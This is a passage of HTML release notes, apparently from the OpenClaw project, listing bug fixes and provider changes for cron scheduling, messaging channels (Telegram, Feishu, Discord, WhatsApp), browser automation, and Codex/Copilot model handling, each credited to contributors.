<li>Cron: hydrate flat legacy job rows with top-level <code>cron</code>, <code>tz</code>, <code>session</code>, and <code>message</code> fields into canonical schedule, target, and payload objects before startup recomputes run times. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059364525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43351/hovercard" href="https://github.com/openclaw/openclaw/issues/43351">#43351</a>.</li>
<li>Agents/replies: let pending group chat history trigger bare mentioned turns without treating metadata-only inbound context as user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327616390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71489" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71489/hovercard" href="https://github.com/openclaw/openclaw/issues/71489">#71489</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327739393" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71520" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71520/hovercard" href="https://github.com/openclaw/openclaw/pull/71520">#71520</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Google media generation: strip a configured trailing <code>/v1beta</code> from Google music/video provider base URLs before calling the Google GenAI SDK, preventing doubled <code>/v1beta/v1beta</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226005033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63240" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63240/hovercard" href="https://github.com/openclaw/openclaw/issues/63240">#63240</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226196460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63258/hovercard" href="https://github.com/openclaw/openclaw/pull/63258">#63258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hybirdss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hybirdss">@Hybirdss</a>.</li>
<li>Discord: restore direct-message voice-note preflight transcription and classify URL-only Ogg/Opus voice attachments as audio while skipping partial attachments without usable URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207287932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61314" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61314/hovercard" href="https://github.com/openclaw/openclaw/issues/61314">#61314</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244552483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64803/hovercard" href="https://github.com/openclaw/openclaw/issues/64803">#64803</a>.</li>
<li>Plugins/build: copy bundled plugin skill trees into <code>dist-runtime</code>, broaden Windows symlink-copy fallbacks, and fingerprint runtime dependencies from <code>lstat</code> so symlink-like directory entries cannot crash staging.</li>
<li>Google Chat: preserve reply text when a typing indicator message is deleted or can no longer be updated, so media captions and first text chunks are resent instead of silently disappearing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327650702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71498" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71498/hovercard" href="https://github.com/openclaw/openclaw/pull/71498">#71498</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colin-lgtm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colin-lgtm">@colin-lgtm</a>.</li>
<li>Cron: tolerate malformed legacy job rows in startup, main-session system-event payloads, and human-readable <code>cron list</code> output so missing <code>state</code>, <code>payload.text</code>, or display fields no longer crash the scheduler or CLI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256052544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66016/hovercard" href="https://github.com/openclaw/openclaw/issues/66016">#66016</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254208406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65916/hovercard" href="https://github.com/openclaw/openclaw/issues/65916">#65916</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237081136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64137/hovercard" href="https://github.com/openclaw/openclaw/issues/64137">#64137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173024002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57872" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57872/hovercard" href="https://github.com/openclaw/openclaw/issues/57872">#57872</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197639692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59968/hovercard" href="https://github.com/openclaw/openclaw/issues/59968">#59968</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233361564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63813" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63813/hovercard" href="https://github.com/openclaw/openclaw/issues/63813">#63813</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120171658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52804" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52804/hovercard" href="https://github.com/openclaw/openclaw/issues/52804">#52804</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057886163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43163" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43163/hovercard" href="https://github.com/openclaw/openclaw/issues/43163">#43163</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327695420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71509" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71509/hovercard" href="https://github.com/openclaw/openclaw/pull/71509">#71509</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/models: make <code>openclaw models scan</code> fall back to public OpenRouter free-model metadata when no <code>OPENROUTER_API_KEY</code> is configured, avoid config secret resolution for explicit <code>--no-probe</code> scans, and apply the scan timeout to the OpenRouter catalog request.</li>
<li>Feishu: keep streaming cards to one live card per turn, flush throttled card edits after meaningful text boundaries, and skip exact block/partial repeats so tool-heavy replies do not duplicate card output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/allan0509/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/allan0509">@allan0509</a>.</li>
<li>Feishu: finish the streaming-card duplicate closeout by stripping leaked reasoning tags, preserving cross-block partial snapshots, enabling topic-thread streaming cards, omitting the generic <code>main</code> card header, surfacing transient tool/compaction status, and cleaning streaming state after close failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sesame437/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sesame437">@sesame437</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vicky-v7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vicky-v7">@Vicky-v7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maoku-family/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maoku-family">@maoku-family</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pengxiao-Wang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pengxiao-Wang">@Pengxiao-Wang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Maple778/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Maple778">@Maple778</a>.</li>
<li>Telegram: recover incomplete partial-stream previews by falling back to a final send when an ambiguous final edit failure would otherwise retain a strict prefix of the answer. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327777647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71525" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71525/hovercard" href="https://github.com/openclaw/openclaw/issues/71525">#71525</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327970972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71554/hovercard" href="https://github.com/openclaw/openclaw/pull/71554">#71554</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>Control UI/chat: collapse assistant token/model context details behind an explicit Context disclosure and show full dates in message footers, making historical transcript timing clear without noisy default metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326580782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71337/hovercard" href="https://github.com/openclaw/openclaw/pull/71337">#71337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>OpenAI/Codex OAuth: explain <code>unsupported_country_region_territory</code> token-exchange failures with a proxy/region hint instead of surfacing a generic OAuth error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4109246729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51175/hovercard" href="https://github.com/openclaw/openclaw/issues/51175">#51175</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327668763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71501/hovercard" href="https://github.com/openclaw/openclaw/pull/71501">#71501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wulala-xjj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wulala-xjj">@wulala-xjj</a>.</li>
<li>Browser/Linux: fall back to headless mode for local managed profiles on hosts without a display server, while preserving explicit per-profile headed overrides and reporting the headless source. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205308957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60953/hovercard" href="https://github.com/openclaw/openclaw/pull/60953">#60953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rrpsantos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rrpsantos">@rrpsantos</a>.</li>
<li>Telegram: remove the startup persisted-offset <code>getUpdates</code> preflight so polling restarts do not self-conflict before the runner starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295160026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69304/hovercard" href="https://github.com/openclaw/openclaw/issues/69304">#69304</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303812517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69779/hovercard" href="https://github.com/openclaw/openclaw/pull/69779">#69779</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Telegram: keep the polling stall watchdog active even when grammY reports the runner as not running while its task is still pending, so a rebuilt transport cannot leave <code>getUpdates</code> silent until a manual gateway restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291652137" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69064/hovercard" href="https://github.com/openclaw/openclaw/issues/69064">#69064</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LDLoeb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LDLoeb">@LDLoeb</a>.</li>
<li>Subagents: fall back to direct completion delivery when the parent announce turn finishes without a visible payload, so child results still reach channel-backed requester sessions.</li>
<li>Subagents: tell parent agents to use <code>sessions_yield</code> while waiting for child completion events, preventing GPT-5 fast runs from ending silently after spawning workers.</li>
<li>Browser/Playwright: ignore benign already-handled route races during guarded navigation so browser-page tasks no longer fail when Playwright tears down a route mid-flight. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289338446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68708/hovercard" href="https://github.com/openclaw/openclaw/pull/68708">#68708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Steady-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Steady-ai">@Steady-ai</a>.</li>
<li>Browser/CLI: lazy-load browser command groups and plugin runtime services so <code>openclaw browser --help</code> can render without loading the full browser automation stack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248388921" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65400/hovercard" href="https://github.com/openclaw/openclaw/issues/65400">#65400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248899051" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65460/hovercard" href="https://github.com/openclaw/openclaw/pull/65460">#65460</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263144074" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66640" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66640/hovercard" href="https://github.com/openclaw/openclaw/pull/66640">#66640</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pandego/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pandego">@pandego</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tianworld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tianworld">@Tianworld</a>.</li>
<li>Browser/CLI: serve precomputed <code>openclaw browser --help</code> text from CLI startup metadata, avoiding the full plugin/config startup path for the common help invocation.</li>
<li>Browser/downloads: seed managed Chrome profiles with OpenClaw download prefs and capture unmanaged click-triggered downloads under the guarded downloads directory, while explicit download waiters still own their target file. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242367248" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64558/hovercard" href="https://github.com/openclaw/openclaw/pull/64558">#64558</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pearcekieser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pearcekieser">@Pearcekieser</a>.</li>
<li>Browser/Chrome: stop passing redundant <code>--disable-setuid-sandbox</code> when <code>browser.noSandbox</code> is enabled; <code>--no-sandbox</code> remains the effective sandbox opt-out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279830525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67939/hovercard" href="https://github.com/openclaw/openclaw/pull/67939">#67939</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sebykrueger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sebykrueger">@sebykrueger</a>.</li>
<li>Browser/client: stop telling agents to permanently avoid the browser after transient timeout or cancellation failures; keep the no-retry hint for persistent unavailable/rate-limit cases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076448290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46505/hovercard" href="https://github.com/openclaw/openclaw/pull/46505">#46505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jriff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jriff">@jriff</a>.</li>
<li>Browser/aria snapshots: bind <code>format=aria</code> <code>axN</code> refs to live DOM nodes through backend DOM ids when Playwright is available, so follow-up browser actions can use those refs without timing out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217034518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62434/hovercard" href="https://github.com/openclaw/openclaw/pull/62434">#62434</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrKipler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrKipler">@MrKipler</a>.</li>
<li>Telegram: prevent duplicate in-process long pollers for the same bot token and add clearer <code>getUpdates</code> conflict diagnostics for external duplicate pollers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158101646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56230" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56230/hovercard" href="https://github.com/openclaw/openclaw/issues/56230">#56230</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Co-Messi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Co-Messi">@Co-Messi</a>.</li>
<li>Browser/Linux: detect Chromium-based installs under <code>/opt/google</code>, <code>/opt/brave.com</code>, <code>/usr/lib/chromium</code>, and <code>/usr/lib/chromium-browser</code> before asking users to set <code>browser.executablePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085382761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48563" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48563/hovercard" href="https://github.com/openclaw/openclaw/pull/48563">#48563</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lupuletic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lupuletic">@lupuletic</a>.</li>
<li>Sessions/browser: close tracked browser tabs when idle, daily, <code>/new</code>, or <code>/reset</code> session rollover archives the previous transcript, preventing tabs from leaking past the old session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jakozloski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jakozloski">@jakozloski</a>.</li>
<li>Sessions/forking: fall back to transcript-estimated parent token counts when cached totals are stale or missing, so oversized thread forks start fresh instead of cloning the full parent transcript. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>OpenAI/Codex: send Codex Responses system prompts through top-level <code>instructions</code> while preserving the existing native Codex payload controls.</li>
<li>MCP/CLI: retire bundled MCP runtimes at the end of one-shot <code>openclaw agent</code> and <code>openclaw infer model run</code> gateway/local executions, so repeated scripted runs do not accumulate stdio MCP child processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327469009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71457/hovercard" href="https://github.com/openclaw/openclaw/issues/71457">#71457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spartoviMD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spartoviMD">@spartoviMD</a>.</li>
<li>OpenAI/Codex image generation: canonicalize legacy <code>openai-codex.baseUrl</code> values such as <code>https://chatgpt.com/backend-api</code> to the Codex Responses backend before calling <code>gpt-image-2</code>, matching the chat transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327474967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71460/hovercard" href="https://github.com/openclaw/openclaw/issues/71460">#71460</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</li>
<li>Control UI: make <code>/usage</code> use the fresh context snapshot for context percentage, and include cache-write tokens in the Usage overview cache-hit denominator. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080148005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47885/hovercard" href="https://github.com/openclaw/openclaw/issues/47885">#47885</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/imwyvern/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/imwyvern">@imwyvern</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ante042/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ante042">@Ante042</a>.</li>
<li>GitHub Copilot: preserve encrypted Responses reasoning item IDs during replay so Copilot can validate encrypted reasoning payloads across requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327393792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71448/hovercard" href="https://github.com/openclaw/openclaw/pull/71448">#71448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a410979729-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a410979729-sys">@a410979729-sys</a>.</li>
<li>GitHub Copilot: never rewrite connection-bound reasoning item IDs regardless of whether <code>encrypted_content</code> is present, fixing a 400 "Encrypted content item_id did not match" error with <code>gpt-5.3-codex</code> and future Codex models that fall through to the forward-compat catch-all with <code>reasoning: false</code>. Also recognize Codex-named models as reasoning-capable so they inherit the correct capability flags. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289536760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68735" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68735/hovercard" href="https://github.com/openclaw/openclaw/issues/68735">#68735</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/InvalidPandaa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/InvalidPandaa">@InvalidPandaa</a>.</li>
<li>Agents/replies: recover final-answer text when streamed assistant chunks contain only whitespace, preventing completed turns from surfacing as empty-payload errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327458962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71454/hovercard" href="https://github.com/openclaw/openclaw/issues/71454">#71454</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327500044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71467" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71467/hovercard" href="https://github.com/openclaw/openclaw/pull/71467">#71467</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Feishu/TTS: transcode voice-intent MP3 and other audio replies to Ogg/Opus before sending native Feishu audio bubbles, while keeping ordinary MP3 attachments as files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206957369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61249" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61249/hovercard" href="https://github.com/openclaw/openclaw/issues/61249">#61249</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034320677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37868/hovercard" href="https://github.com/openclaw/openclaw/issues/37868">#37868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ycjlb2023-peteryi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ycjlb2023-peteryi">@ycjlb2023-peteryi</a>.</li>
<li>WhatsApp/TTS: transcode MP3/WebM audio, including Microsoft Edge TTS output, to Ogg/Opus before sending PTT voice notes.</li>
<li>QQBot/TTS: honor plain <code>audioAsVoice</code> replies by synthesizing TTS to native QQ voice messages, and mark inbound voice-only messages as audio media without exposing raw voice paths to generic media context.</li>
<li>Providers/SenseAudio: add bundled SenseAudio batch audio transcription through <code>tools.media.audio</code> with <code>SENSEAUDIO_API_KEY</code> auth. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265936553" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66943/hovercard" href="https://github.com/openclaw/openclaw/pull/66943">#66943</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fl0rencess720/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fl0rencess720">@Fl0rencess720</a>.</li>
<li>Providers/MiniMax: let TTS use MiniMax portal OAuth and Token Plan credentials before falling back to <code>MINIMAX_API_KEY</code>, and include current TTS HD model ids. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141517456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55017/hovercard" href="https://github.com/openclaw/openclaw/issues/55017">#55017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zx15210404690-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zx15210404690-hash">@zx15210404690-hash</a>.</li>
<li>Telegram/webhook: acknowledge validated webhook updates before running bot middleware, keeping slow agent turns from tripping Telegram delivery retries while preserving per-chat processing lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326997239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71392/hovercard" href="https://github.com/openclaw/openclaw/issues/71392">#71392</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelforsberg46-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelforsberg46-source">@joelforsberg46-source</a>.</li>
